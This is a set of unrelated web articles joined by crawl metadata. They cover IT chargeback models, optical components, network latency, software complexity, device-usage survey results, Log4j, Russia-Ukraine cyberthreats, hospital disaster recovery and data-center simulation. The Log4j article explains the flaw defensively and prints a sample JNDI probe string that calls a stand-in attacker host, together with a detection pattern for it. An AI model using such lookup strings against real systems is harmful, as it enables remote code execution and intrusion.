Creating a commercial awareness means allowing consumers to choose service alternatives based on service level agreements (SLAs) and pricing, which in turn allows them to choose exactly what they order and how much they pay for the lunch bill!
When consumers start paying for what they use, it has a positive effect on the entire business, because it immediately changes employee behaviour, since the items can no longer be used as if they were free. Studies show that feedback around cost implications on consumption delivered in a timeous fashion is effective in changing consumer behaviour on an ongoing basis.
Of course, setting the correct price point is just as vital when it comes to influencing business demand. As with all markets, there will be times when a subsidy or tax is the best tool to drive the correct, holistic organisational behaviour, and this is often the case within Shared Service organisations.
For example, setting up a new data centre may be expensive for the first adopters, as start-up costs are high and require economies of scale to see true benefits. The question that needs to be answered then is how can cost transparency be used to influence this behaviour?
The answer is to subsidise the price of the data centre, with the goal of encouraging adoption until the economies of scale kick in. This is done by artificially lowering the price point as a way to initially make the data centre attractive to newcomers.
Naturally, this places a high level of responsibility on shared services to educate its customers on the services it performs, the results delivered and the opportunities for improvement. Cost transparency clearly enables such education relatively easily and – when coupled with a solid understanding by shared services around what its customers do with the services they buy, and how well these products meet the customers’ needs – should help shared services to accurately gauge customer requirements and estimate the impact of these on business performance. Once this is achieved, shared services should also be positioned to reliably identify the next form of leverage to pursue.
Once these initial objectives are successfully met, the next step for shared services is to expand the portfolio of services offered, after which it needs to begin leveraging knowledge-based expertise. It needs to look beyond what it does currently, linking its plan to overall company goals and assessing how it can optimise its contributions on behalf of all parties.
In the end, as shared services strategies mature, the next step in their evolution may well see them move to the core of the business, where they will no longer just be focused on driving cost savings, but on performing business-critical processes that contribute a much higher level of organisational value.
What are chargeback and showback models?
It may be advisable to launch a shared services approach using the showback model (defined below) for a limited period of, say, three to six months, as a way of effectively introducing the manner in which it all works. Once employees have a better understanding of how the costing will work and have had the opportunity to become used to the model, switching to a chargeback approach will be much easier for them to accept.
Chargeback is, as the name suggests, a method of charging a company’s internal consumers for the shared services they use. So, for example, with IT services, instead of bundling all the IT costs under the IT department, a chargeback program will allocate the various costs of delivering IT – such as hardware, software and maintenance – to the individual business units that consume them.
In those cases where shared services are viewed as essentially a commodity, accountability and efficiency improvements will likely afford the kind of significant cost savings that make chargeback a very attractive path.
Showback is closely related to chargeback; while it offers many of the same advantages, it does not have all of the drawbacks. It employs the same strategy as chargeback with regard to tracking and cost-centre allocation of expenses, through the measurement and display of the cost breakdown of services by consumer unit, but it does this without actually transferring costs back.
Costs remain in the shared services centre, but information about consumer utilisation is far more transparent. Moreover, showback is often much easier to implement as, unlike with the chargeback model, there are no immediate budgetary impacts on user groups.
Regardless of the model, however, both showback and chargeback operate on the same premise: that awareness drives accountability. However, it must be remembered that once business units are aware they will not be charged in the showback system, their attention to efficiency and improving usage may very well not be as focused.
How to build a trusted showback or chargeback model
In implementing such a model, it is worth noting that there are a number of prerequisites that one must have in place, in order to effectively create a trusted Cost Transparency solution that will help drive adoption:
• Create a defendable cost model
This should be a model that offers an accurate means of attributing cost and consumption, which can be achieved by identifying cost drivers and using consumption-based drivers that mimic reality as much as possible (a small allocation sketch follows this list).
• Ensure that multiple options are made available
Allow consumers to utilise different options and service alternatives, such as the tiering of services, accompanying service levels and access to alternative technologies. There is little use in creating a chargeback or showback model in which consumers do not have alternative options or the ability to choose what products and services they consume, at appropriate price points.
Key aspects of the model, including data, inputs and changes, as well as any resulting alterations in behaviour, must be felt and their effect seen quickly. Consumers must be able to see how their consumption choices, and the changes they make to these, have a visible and tangible effect on their business unit.
• Hosting Solution
Once both your model and reporting requirements have reached a sufficient scale, it is important to adopt a robust, secure and scalable software solution. In essence, it needs to be one that has the flexibility to accommodate any scenario, as well as the freedom to reflect how your business operates.
The crucial key to successful cost transparency and cost model adoption, and one which helps to drive trust because consumers can see what ownership or consumption basis has driven an allocation, is granularity. Essentially, this is the ability to see all of the highly detailed driver information that makes up a charge. A good example here would be how a business unit may have been charged for ‘connectivity’ in the past, but this can now be broken down into component parts, such as the cost of the fibre, the servers, switches and routers involved in providing the service, as well as affiliated costs such as the power and cooling required in the data centre. Granularity makes the driver basis defendable and believable, and even in situations where the data is wrong, one can still drive a positive outcome through error identification and data remediation.
• Win over key stakeholders
It is important to identify key influencers in the organisation and focus on winning them over first – in this way, you convert them to evangelists of your model. Identify topical quick wins and deliver on those first. Communicate that it is a journey and manage expectations around changes. Just like shared services can’t deliver on all business asks, prioritise roadmap items and relentlessly focus on those to drive value. Create a governance process around changes, but exempt consumers from changes that may be linked to their performance or personal incentives. Win adoption of proposed changes by showcasing their intentions and intended benefits. Compare changes before and after.
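As promised above, here is a minimal Python sketch of a consumption-driven allocation, the mechanic that underpins both showback and chargeback. The services, drivers, business units, and figures are all made-up examples; a real model would draw its drivers from metered usage data.
service_cost = {"Storage": 120_000, "Service desk": 80_000}   # annual cost per shared service
# Measured consumption drivers per business unit (TB stored, tickets raised).
consumption = {
    "Retail":    {"Storage": 40, "Service desk": 1_200},
    "Wholesale": {"Storage": 25, "Service desk": 300},
    "Corporate": {"Storage": 10, "Service desk": 500},
}
# Unit rate for each service = total service cost / total consumption of its driver.
total_usage = {s: sum(unit[s] for unit in consumption.values()) for s in service_cost}
unit_rate = {s: service_cost[s] / total_usage[s] for s in service_cost}
for unit, drivers in consumption.items():
    charge = sum(unit_rate[s] * quantity for s, quantity in drivers.items())
    print(f"{unit:10s} allocated cost = {charge:10,.2f}")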
Shared services allow for costs to be reduced through the economies of scale from centralisation of services, but when it comes to truly understanding costs, the shared services environment is extremely complex. This is exactly what the discipline of cost transparency is designed to address: enabling enterprises to attribute costs more accurately, while also enabling those people responsible for specific areas of the business to understand which costs they are able to control and which levers they can pull to effect changes in these.
With cost transparency, one not only obtains a clearer view of costs, but also the ability to do something about them in a way that helps to increase performance. The granular knowledge of what services are not being used to their fullest extent will enable consolidation and cost reduction, coupled with increased efficiencies.
This demonstrates that the best cost transparency strategies move beyond simply cost savings and into the arena of optimisation. In the end, it is about transforming the conversations between what the business unit needs and what Shared Services provides.
Ultimately, Cost Transparency as a solution is designed to help businesses to reduce, consolidate and standardise expenditure. After all, if you are able to effectively unpack the cost of shared services, you can use this knowledge to drive improved savings. Cost Transparency is designed to give business access to the levers it needs to make truly informed IT decisions, unlocking greater value from existing IT investments and delivering increased savings with regard to future investments.
When used effectively, Cost Transparency is a powerful tool that creates an efficient and optimised organisation where business and shared service providers are aligned and organisationally altruistic behaviours are encouraged and incentivised.
Blake Davidson, Head of Delivery, Magic Orange (opens in new tab) | <urn:uuid:e569103f-1b29-49ec-a6f6-13ad08bbe709> | CC-MAIN-2022-40 | https://www.itproportal.com/features/role-of-cost-transparency-in-shaping-business-demand/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00541.warc.gz | en | 0.958735 | 2,956 | 2.6875 | 3 |
DigiLens Creates 'Liquid Gratings'
Like other component developers, DigiLens is splitting light into different wavelengths using Bragg gratings. But unlike others in this field, it’s forming these Bragg gratings in liquid crystals rather than solid substrates such as silica and silicon. As the characteristics of the liquid crystal can be modified by applying an electric current, DigiLens can split off a specific wavelength and then adjust its power or switch it in a single operation.
"We’re compressing functionality onto a waveguide that previously would have required multiple separate devices," says Jonathan Waldern, CEO of DigiLens. This means that Digilens’s components will be simpler to make and thus lower in cost, he adds.
Digilens calls its technology electrically-switchable Bragg grating (ESBG) or “S-Bug". Components are made by creating a row of ESBGs, each one handling a specific wavelength, on top of a single silica waveguide. The ESBGs themselves are formed from a mixture of polymer and liquid crystal, which have Bragg gratings (a series of stripes of different refractive index) created in them to reflect back specific wavelengths. This is done by exposing the polymer and liquid crystal mixture to ultraviolet light from intersecting laser beams, which form an interference pattern. The liquid crystal diffuses to areas of high light intensity, creating microdroplets.
In use, when a voltage is applied to this arrangement, the refractive index of the microdroplets is reduced, effectively erasing the grating and letting all the light through. With no applied voltage, the grating diffracts light at a specific wavelength out of the waveguide.
Digilens has been using this technology for making microdisplays for some time, and now it's moving into the telecom market.
It's starting by developing dynamic spectral equalizers (DSEs), devices that extend the range of dense wavelength-division multiplexing (DWDM) systems by ensuring that power levels are the same in every channel. It's aiming to ship 6- and 10-channel models this quarter.
At least two other vendors already make DSEs. One of them, Corning Inc. (NYSE: GLW) uses liquid crystals to adjust power levels in the same way as Digilens. But it requires a string of other devices to split the light into different wavelengths and handle polarization issues (see What's Hot At The OFC). The other vendor, Ultraband Fiber Optics Inc., is basing its developments on acousto-optical tunable filters.
Digilens is also planning on making an electronic variable optical attenuator, a single channel version of its DSE, in the same time frame.
In the longer term, Digilens is planning to develop 1x1 and 2x2 optical switches suitable for restoration and protection functions, with a target shipment date in 2002.
The benefits of ESBGs become apparent in optical add-drop muxes (OADMs), which Digilens is also planning to develop. In today’s OADMs, the wavelengths must be broken out so that each one can be directed by a separate 2x2 switch. Finally, all the wavelengths must be recombined. Waldern claims that DigiLens could do all this in a single integrated component. For a six-channel device, this would reduce the component count by a factor of eight, and reduce the cost by about a third, he says.
DigiLens licenses the intellectual property rights for the ESBG from Science Applications International Corp. (SAIC), an independent R&D company which owns Telcordia Technologies Inc. (formerly Bellcore). SAIC is the biggest investor in DigiLens with a 10 percent stake.
Digilens recently raised a fourth round of $40 million, bringing total funding to date to $67 million (see Round 4 for DigiLens: $40M).
-- Pauline Rigby, senior editor, Light Reading http://www.lightreading.com | <urn:uuid:203fc39d-0936-434a-a028-59eb9c4a5a4c> | CC-MAIN-2022-40 | https://www.lightreading.com/digilens-creates-liquid-gratings/d/d-id/571406 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00541.warc.gz | en | 0.913478 | 852 | 2.984375 | 3 |
When a client sends a request to a server across the Internet, a complicated series of network transactions is involved. A typical request path will have the client sending the request to a local gateway, which in turn routes the request through a sequence of routers, firewalls and load balancers, and finally to the server. Each step or “hop” involves receiving, processing, and forwarding the data.
All of this takes time, so each hop introduces a delay. Network latency is the total time, usually measured in milliseconds, required for a server and a client to complete a network data exchange. Even if there are no intermediate hops, which is never the case for communications across the Internet, latency is still involved because the request has to traverse layers of software and hardware at each end.
There are two ways to measure network latency: Round Trip Time (RTT), the time for a request to reach the server and for the response to return to the client, and Time to First Byte (TTFB), the time from when the request is sent until the client receives the first byte of the response.
If we’re concerned about how network latency affects application performance, then the Round Trip Time is what we care about. On the other hand, if we’re trying to optimize Internet of Things (IoT) transactions we’ll usually be more concerned about Time to First Byte latency.
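For readers who want to see the two measurements side by side, here is a small Python sketch that estimates Round Trip Time (via the TCP connection handshake) and Time to First Byte (via an HTTPS request) using only the standard library. The hostname is an example, and the figures are rough approximations rather than precise network measurements.
import http.client
import socket
import time
HOST = "www.example.com"   # example host
# RTT estimate: time to establish a TCP connection to the server.
start = time.perf_counter()
sock = socket.create_connection((HOST, 443), timeout=5)
rtt_ms = (time.perf_counter() - start) * 1000
sock.close()
# TTFB estimate: time from sending a request until the response status line arrives.
conn = http.client.HTTPSConnection(HOST, timeout=5)
start = time.perf_counter()
conn.request("GET", "/")
response = conn.getresponse()
ttfb_ms = (time.perf_counter() - start) * 1000
conn.close()
print(f"Approximate RTT:  {rtt_ms:.1f} ms")
print(f"Approximate TTFB: {ttfb_ms:.1f} ms")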
When it comes to real-world applications such as high frequency stock trading, minimizing communications latency by even a millisecond potentially gives the trader a huge advantage. This is why, for example, Hibernia Atlantic (now acquired by GTT Atlantic) spent $300 million laying a 6,021km (3,741 mile) fiberoptic link from New York to London to deliver a Round Trip Time of 59 milliseconds, 6 milliseconds less than the next best link latency. It’s been estimated that the reduced network latency could give a large hedge fund an additional profit of close to $100 million per year.
Minimizing network latency is about optimizing all the elements of the networking infrastructure. Even when you’ve deployed ultra-high-performance hardware, optimizing software and protocols is the key, and Application Delivery Controllers (ADCs) provide a range of features that deliver these optimizations, including SSL/TLS offloading, content caching, compression, and TCP optimization.
Along with load balancing and infrastructure health checks, A10 Networks Thunder® Series Application Delivery Controllers (ADCs) deliver advanced traffic management and optimization features including offloading CPU-intensive SSL/TLS transactions from servers with SSL Offloading with Perfect Forward Secrecy (PFS) ciphers, content caching, compression, and TCP optimization.
Take this brief multi-cloud application services assessment and receive a customized report.Take the Survey | <urn:uuid:27a35f51-65d4-4ce4-b06a-dd0b6b01669b> | CC-MAIN-2022-40 | https://www.a10networks.com/glossary/what-is-network-latency/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00541.warc.gz | en | 0.903825 | 496 | 2.578125 | 3 |
Size and complexity are the enemies of cybersecurity
In cybersecurity we are always faced with the chance that our system harbors some unknown vulnerability, and the possibility that this vulnerability will be discovered by some malicious actor who will then use it against our system, as well as other, similar systems.
Cybersecurity vulnerabilities are the result of two kinds of errors or defects: design errors and implementation errors. A design error is where the functionality of a system or component is not properly and comprehensively analyzed and understood so that the resulting design does not cover all possible use cases. Analysis of a system requires understanding and capturing all the possible ways that a system will be used, as well as the limits of how the system will be used such that only the planned functionality is enabled by the system. The design is the plan for how the system will implement the functionality that satisfies the analysis results. The design captures the structure of a system or component and the breakdown of the partitioning of the major functionality.
Implementation is the realization of the design: the development of the system or component using software development tools such as editors and compilers in the specified languages and frameworks. All configurations are also included in the implementation. The development process often includes build and integration processes, coding standards, design patterns, code reviews, and testing as methods to increase the likelihood that the resulting implementation is as true to the design as possible and has the fewest defects possible.
Both the design phase and the implementation phase provide opportunities for creating defects that may become vulnerabilities in the system or component. The number of defects produced in a system or component directly correlates to the complexity and size of the system, as defects typically occur at a rate per unit of development. So, roughly, a design or implementation that is twice as large will have twice the number of defects.
The complexity of a design or implementation has a similar effect of creating defects in a system. But, unlike implementation size the number of defects can increase much faster with increasing complexity. Complexity is difficult to quantify, but is related to how many elements are needed to create a solution and how many relationships are involved in those elements. It is also related to how many steps are needed to accomplish a use case of the system or component.
Humans are good at keeping simple constructs in their minds and understanding them. When the size and complexity of a system increases the human developer must break it down into simpler pieces that can then be understood at once. And relationships must be abstracted and reduced to easily understood assemblies. When a system is large and complex the number of possible relationships tends to grow faster than linear, and the number of possible paths in the system grows exponentially. Thus the system quickly becomes unwieldy to the human developer as the size and complexity grows.
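A back-of-the-envelope illustration of that growth: the short Python snippet below compares the number of possible pairwise relationships, which grows quadratically with the number of components, against the number of combinations of independent two-way choices, which grows exponentially. The component counts are arbitrary.
for n in (10, 20, 40, 80):
    relationships = n * (n - 1) // 2    # possible pairwise interactions
    combinations = 2 ** n               # e.g. independent on/off states or branch outcomes
    print(f"{n:3d} components: {relationships:5d} pairwise relationships, "
          f"{combinations:.2e} combinations")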
The size and complexity of a system directly results in a greater number of defects and resulting vulnerabilities as these quantities grow. On the other hand, the number of defects and cybersecurity vulnerabilities shrinks as the system or component is made smaller and simpler. This strongly suggests that designs and implementations that are small and simple should be very much favored over large and complex if effective cybersecurity is to be obtained.
The article was written by David W. Viel, Ph.D., the founder and CEO of Cognoscenti Systems, LLC. He has extensive experience in research and development of mission critical systems in a wide variety of fields including military control systems, space, modeling and simulation, computer languages, telecommunications, and distributed systems. He also has led a number of teams in the development mission critical systems. First the article was published here. | <urn:uuid:b8064b26-f0e8-46d1-a4b3-f30441628b9d> | CC-MAIN-2022-40 | https://www.iiot-world.com/ics-security/cybersecurity/size-and-complexity-are-the-enemies-of-cybersecurity/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00541.warc.gz | en | 0.956609 | 726 | 3 | 3 |
Dan Ness, Principal Analyst, MetaFacts, January 11, 2019
People love their smartphones and find more to do with them than PCs or tablets. Around the world, there are few activities done with PCs as regularly as are done with smartphones. Furthermore, there are no activities done more so on tablets than on either smartphones or PCs. Usage profiles vary somewhat by country. Online adults in the U.S. use their connected devices differently than users in many other countries.
These findings are based on the TUP/Technology User Profile 2018 study of 14,273 online adults in the US, UK, Germany, India, and China. Of the more than 70 activities in the TUP survey tied to each device, we identified those with the widest range of regular use across devices – defined as the difference between the maximum and minimum usage level among smartphone, PC, and tablet users.
The versatility of smartphones is shown by how much more often they’re the device of choice for nearly every type of activity, from shopping to social networking and fun. The range of activity use is as high as 65% – in the case of making and receiving personal phone calls.
Smartphones are being used the most widely for device-unique activities. The four major activities for smartphones – personal phone calls, taking pictures, text messaging, and storing one’s contacts – are infrequently done on a PC or tablet. Although the newest tablets have cameras that approach the quality of those on smartphones, less than a quarter (22%) are being used to take pictures. Also, despite being able to run apps such as WhatsApp or WeChat on tablets or PCs, phone calls are primarily made on smartphones, even as personal video calls have made inroads on non-phone devices.
PCs are mostly being used for email (personal or work), online shopping (bigger screens entice buyers), and online banking. Tablets are mostly being used for social networking and music listening.
There is a small amount of crossover of activity usage across devices. Two of the major activities for smartphones are also leading ones on tablets – adding photos to social media and commenting on others’ images or comments.
American adults use their devices somewhat differently than users in other countries. In addition to personal and work email, PCs are used more often than smartphones or tablets for shopping, banking, finances/accounting, and writing.
Tablets are being used more like PCs than smartphones. The major activities for tablets, although with smaller percentages than PCs, are also among the major activities for PCs. Also, in the US, UK, and Germany, tablets are used more often than either PCs or smartphones for reading a book and making small purchases in person, such as in a coffee shop.
Where PCs dominate
Smartphones aren’t the only connected device users actively use. There are many activities used at a higher rate on PCs than on smartphones are tablets. Sending and checking both personal and work email are high on the list across all of the countries surveyed except for India. Also, writing and managing text documents is a PC-preferred activity except in India. In Germany, writing documents is an especially PC-dominant activity. Also, activities relating to using a printer are strongest when using a PC.
Habits change slowly. Not only do people find effective ways to use connected devices to do what they want, they also show inertia when slowly moving those activities to a different device. Even those users who have multiple devices continue to use the types of devices they had previously for some time before fully embracing a type of device new to them.
Furthermore, there isn’t a single “silver bullet” device that’s preferred for all activities. For some activities, such as reading a book, shopping, or watching television, having a larger display helps. For other activities, such as receiving phone calls or texting, convenience and mobility are key.
We don’t expect the majority of users to concentrate all of their activities on a single device in the near future. Instead, the multi-device experience will continue. PCs may continue to lose their dominance for the many activities they still dominate. Dedicated PC users may just move more of their attention to tablets, especially those focused on passive activities such as social networking or television watching.
The analysis in this TUPdate is based on results drawn from multiple waves of TUP/Technology User Profile, including the 2018 edition which is TUP’s 36th continuous wave.
TUPdates feature analysis of current or essential technology topics. The research results showcase the TUP/Technology User Profile study, MetaFacts’ survey of a representative sample of online adults profiling the full market’s use of technology products and services. The current wave of TUP is TUP/Technology User Profile 2020, which is TUP’s 38th annual. TUPdates may also include results from previous waves of TUP.
Current subscribers may use the comprehensive TUP datasets to obtain even more results or tailor these results to fit their chosen segments, services, or products. As subscribers choose, they may use the TUP inquiry service, online interactive tools, or analysis previously published by MetaFacts.
On request, interested research professionals can receive complimentary updates through our periodic newsletter. These include MetaFAQs – brief answers to frequently asked questions about technology users – or TUPdates – analysis of current and essential technology industry topics. To subscribe, contact MetaFacts. | <urn:uuid:e3fb9862-a152-40d7-ad73-097f7386542e> | CC-MAIN-2022-40 | https://metafacts.com/how-and-where-pcs-and-tablets-are-used-differently-than-smartphones-tupdate/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00741.warc.gz | en | 0.951394 | 1,133 | 2.546875 | 3 |
News of a widespread security exploit within the Log4j internet software (also called Log4shell) sent IT and security teams into emergency mode earlier this week. With lots of information swirling around, BARR associates came together to compile the most important details you need to know about this software flaw.
What is Log4j?
Log4j is a free framework distributed by the Apache Software Foundation that has millions of downloads across the globe, all of which collect data from things like computer networks, apps, and websites.
“The best way to describe Log4j is a Java library used for logging error messages,” said Brett Davis, senior consultant, cyber risk advisory at BARR. “The Log4j vulnerability allows for remote code execution by input of a textbox.”
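To make that mechanism concrete, the sketch below (not part of BARR's analysis) shows the shape of a typical Log4Shell probe string and a first-pass pattern check for it. The hostname and log text are placeholders, and real-world payloads are frequently obfuscated, so a pattern like this is only a rough filter and never a substitute for patching.

```python
import re

# A Log4Shell probe hides a JNDI lookup inside any text that ends up being logged,
# such as a User-Agent header or the contents of a login text box.
example_log_line = "Failed login for user: ${jndi:ldap://attacker.example/a}"  # placeholder payload

# Naive check for the un-obfuscated form of the lookup. Attackers often obfuscate
# the string (e.g. ${${lower:j}ndi:...}), so treat this as illustration only.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

if JNDI_PATTERN.search(example_log_line):
    print("Possible Log4Shell probe detected")
```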
So what are the risks?
Already considered one of the most serious software flaws in recent times, the Log4j vulnerability leaves the door wide open to cybercriminals, who can execute code remotely on a target device. Doing this means the hacker can install malware, steal data, and even hijack the device by taking total control of it. There is also a concern that criminals could install ransomware, which locks systems and data until a payment is made to the hacker.
“It’s interesting because, beyond the technical risks associated with exploiting the vulnerability, the risks are exacerbated by poor asset management and dependency tracking within supporting infrastructures,” said Larry Kinkaid, senior consultant, CISO advisory. “It also reveals gaps related to third party risk management such as relationship responsibilities, lack of primary contact information, tracking the sensitivity of data and information the vendor may store or process, and how shared responsibilities are defined.”
The flaw was first discovered within Minecraft, but security experts quickly realized the vulnerability extended to every program using the Log4j library. See GitHub’s list of all the affected software here.
Jen Easterly, director of the Cybersecurity and Infrastructure Security Agency (CISA) who has spent 20 years in various federal cybersecurity roles, released a statement saying, “To be clear, this vulnerability poses a severe risk.” In the statement, Easterly urges companies to act fast, adding, “we have limited time to take necessary steps in order to reduce the likelihood of damage.”
What can you do to protect your organization?
Here are some recommendations from Niti Jadhav, senior consultant, cyber risk advisory, on what you can do to mitigate risk:
- Identify all potentially vulnerable systems at risk (one rough way to locate Log4j libraries on a host is sketched after this list).
- Upgrade devices utilizing Log4j to version 2.15.0 where possible. If not possible, apply these recommended steps.
- Apply patches from vendors as soon as they become available (e.g., AWS’s released mitigations and planned patches).
- Install and configure web application firewall (WAF) rules to focus on Log4j threat detection.
- Utilize monitoring tools to detect and log exploitation attempts.
- Utilize continuous vulnerability scanning to identify vulnerabilities in systems.
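As a starting point for identifying vulnerable systems, here is a rough, illustrative sketch of how you might locate copies of the Log4j core library on a single host and compare their versions against 2.15.0, the version recommended in this post. The starting directory is a placeholder, and shaded or bundled copies inside other JARs will not be found this way.

```python
import os
import re

ROOT = "/opt"  # placeholder starting point; adjust for your environment
JAR_PATTERN = re.compile(r"log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")

# Walk the tree and flag any log4j-core JAR older than 2.15.0 based on its file name.
for dirpath, _dirs, files in os.walk(ROOT):
    for name in files:
        match = JAR_PATTERN.match(name)
        if match:
            version = tuple(int(part) for part in match.groups())
            label = "OK" if version >= (2, 15, 0) else "VULNERABLE - upgrade"
            print(f"{os.path.join(dirpath, name)}: {'.'.join(map(str, version))} ({label})")
```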
For more information on how you can fix the Log4j problem within your organization, we recommend reading this article from the Wall Street Journal.
Still have concerns, questions, or are unsure how to take steps to protect your company? Don’t hesitate to contact us. | <urn:uuid:e7c1e1d6-dc61-43fb-a72c-6e51e4a72fcd> | CC-MAIN-2022-40 | https://www.barradvisory.com/blog/log4j/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00741.warc.gz | en | 0.923509 | 692 | 2.828125 | 3 |
As the Russian-Ukraine war reaches global cyberspace, everyone should be on high alert. State-sponsored hackers may attempt to steal sensitive information or sabotage critical systems to further their political agenda. While Ukraine is a primary target for these threats, many security experts believe that Russian-linked hackers will also set their sights on countries that have imposed heavy sanctions, like the United States. This means American organizations need to be prepared for a new wave of cyberthreats.
What are the biggest cyberthreats to watch out for?
It’s highly likely that US businesses will get caught in the crossfire in the cyberwarfare between Russia and Ukraine. Here are the major cyberthreats that can potentially affect US organizations:
1. Distributed denial-of-service (DDoS)
A DDoS attack is a type of cyberattack that floods a target website or server with traffic from multiple sources, causing it to crash and become unusable. In fact, Russian-linked hacking groups used DDoS to relentlessly attack Ukrainian government websites and critical institutions. While Ukraine fended off most of these attacks, there’s a possibility that Russian DDoS threats will start coming after Western nations that have imposed hefty sanctions over the conflict.
If Russian-linked hackers target unsecured networks today, they could potentially shut down critical infrastructure and further disrupt supply chains all over the US. Businesses who suffer a DDoS attack may also face catastrophic financial damages.
2. Ransomware
Ransomware is a type of malware that encrypts files or systems and prevents users from accessing them until they pay a ransom. In 2021, a Russian-linked hacking group purportedly used ransomware to shut down Colonial Pipeline, halting fuel transportation across the US East Coast. Considering the disruption and damage this ransomware attack caused, state-sponsored cybercriminals may leverage increasingly sophisticated ransomware variants to target vulnerable US businesses. Some modern-day ransomware variants are even designed to steal data while a system is locked down.
3. Phishing scams
The frequency of phishing scams often increases during times of heightened political tension. In this case, hackers may develop phishing campaigns capitalizing on the Russia-Ukraine conflict. Google, in particular, has discovered various phishing campaigns designed to steal login credentials by tricking users into visiting a fake login page. Experts also predict that donation-themed phishing scams that exploit people’s goodwill will become more common during the crisis. Hackers can use these scams not only to steal money directly from unwitting users, but also to install malicious software on their victims’ devices.
4. Remote code execution
Remote code execution is a type of attack that allows hackers to run malicious code on a vulnerable system. To initiate the attack, a hacker must gain unfettered access to a company's network. They typically do this by exploiting an unpatched vulnerability in a web application or operating system. From there, they can infect the network with malware or remain dormant in the system while stealing sensitive information. In fact, the federal Cybersecurity and Infrastructure Security Agency (CISA) is warning US organizations of 95 new vulnerabilities that would enable widespread remote code execution attacks, as per our previous social media video posted on March 29th. If companies fail to install the latest security updates, they could be the next victim caught up in the Russia-Ukraine cyberconflict.
5. Disinformation and cybervandalism
According to recent reports, Ukrainian security experts have found several bot farms using over 100,000 fake social media accounts to disseminate false information. The purpose of these bot farms is to sow discord and confusion among the public. While disinformation isn’t a direct cyberattack, it can still pose a risk to US businesses. Fake news stories targeting specific organizations can destroy reputations, diminish brand equity, and decrease profitability.
How can businesses protect themselves?
The best way to keep your business safe from these types of threats is to establish a comprehensive cybersecurity framework that includes the following components:
- Next-generation firewalls to detect and prevent malicious internet traffic from infiltrating your company network
- Endpoint security solutions to protect devices from malware infection
- Vulnerability assessments to identify and patch insecure systems
- Data backup solutions to keep critical data intact in the event of a cyberattack
- Security awareness training for employees to help them spot phishing emails and other social engineering attacks
Safeguarding your business from a slew of cyberthreats during the Russia-Ukraine crisis can be incredibly taxing, but you don’t have to do it alone. Healthy IT is a leading managed IT services provider that can protect your business with world-class security solutions and expertise. Call us today to mitigate cybersecurity risks. | <urn:uuid:b730e8ea-b31f-4412-9249-e012d182fc85> | CC-MAIN-2022-40 | https://www.myhealthyit.com/russia-ukraine-conflict-exposes-us-businesses-to-cybersecurity-risks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00741.warc.gz | en | 0.91866 | 960 | 2.71875 | 3 |
Today, almost every critical human process depends on automation and electronic data. Hospitals and medical facilities have embraced this trend, with Electronic Health Records (EHR) forming a core aspect of modern-day healthcare. With large amounts of data accumulating in the form of medical records and other hospital data, it is critical that healthcare centers also have a disaster recovery plan.
A data center outage in such a critical environment could endanger the lives of hundreds of patients. Hospitals must ensure that their service networks are reliable and always online. Why? Because these systems form the core to which much of the medical equipment and patient data connect. There are several clinical applications that generate crucial data that must be protected at all costs. In fact, a disaster will affect every part of your business – from patient billing and lab work to personnel and purchasing.
To begin with, the hospital authorities should consult with the IT department and HR to discuss the possible impact zones of a disaster. They should understand how each application is relevant to their business and how its outage could affect the operations of the center. The next step is to find out which sections are more vulnerable to outages. Suitable precautions and solutions to address these critical areas must then be planned.
Finally, these critical services must have remote access to data backup and replication storage facilities so that, in the event of a failure, these services do not go down.
According to a recent Frost & Sullivan market research analysis, the data center market will be worth $432.14 billion per year by 2025. This is up from $244.74 billion in 2019, indicating a 10% annual growth rate. Data center operators, builders, and designers will expand their investment to leverage the deployment and use of IoT, Big Data, and AI. Emerging economies are predicted to grow rapidly, with the Asia-Pacific area leading the way. Data center Computational Fluid Dynamics (CFD) analysis can help operators meet green data center targets while expanding capacity.
This involves making energy and resource efficiency a top concern when developing and operating data centers. A slight boost in overall system efficiency can increase a data center asset’s return on investment significantly. Data centers have traditionally been extremely energy-intensive, with the majority of cooling provided by electricity-hungry chillers and other related equipment. The use of natural heat sinks such as the surrounding air or a water supply has become increasingly popular in recent years. To reduce energy demands for thermal management, many data centers have been built in cooler climes, and some net-zero data center operations even transfer excess heat to meet adjacent heat demands, such as those of nearby homes and offices.
Driven By Simulation
More precise simulation models of how the system operates have enabled recent advances in more energy-efficient data centers. The major energy and environmental aspects of a given design can be captured through simulation and modeling of a data center’s building, equipment, and operation. The model is then simulated against a set of climate and other variables to predict how the design will perform in the real world. Designers can use simulation tools to undertake several design iterations and determine a building’s rigorous, physics-based probabilistic performance. This necessitates the use of analysis software that takes into consideration the physics of heat transport, cooling, ventilation, and other product and material qualities. A fundamental benefit of modeling is options analysis at an early stage of design, which allows multiple designs to be examined swiftly before the design gets too intricate and difficult to change. Engineering simulation is the kind of study engineers perform to analyze and predict the performance of data centers in this way.
Engineering Simulation On The Cloud
Computational Fluid Dynamics (CFD) is a type of engineering simulation that models the behavior of fluids. To mimic the physical and thermal parameters of a data center setup, for example, a 3D model of the data center is employed. CFD can simulate the basic heat transfer mechanisms — conduction, convection, and radiation — and show how they affect the thermal performance of any building or piece of equipment. The approach is made possible by a cloud-based data center CFD simulation platform that can execute several simulations at the same time. This cuts down on the time it takes to thoroughly investigate all of the necessary scenarios within a problem domain, which can number in the hundreds. All conceivable design situations can be simulated at the same time using parallel run capabilities. CFD is helpful in gaining a better understanding of:
Flow characteristics of existing designs that reveal inefficiencies, such as recirculation and isolation zones between aisles or around CRAC units.
Temperature distribution across different sites.
The temperature of the equipment.
Identification of hotspot zones.
Comparison of what-if scenarios and design tweaks.
Computational Fluid Dynamics (CFD) Simulation Best Practices
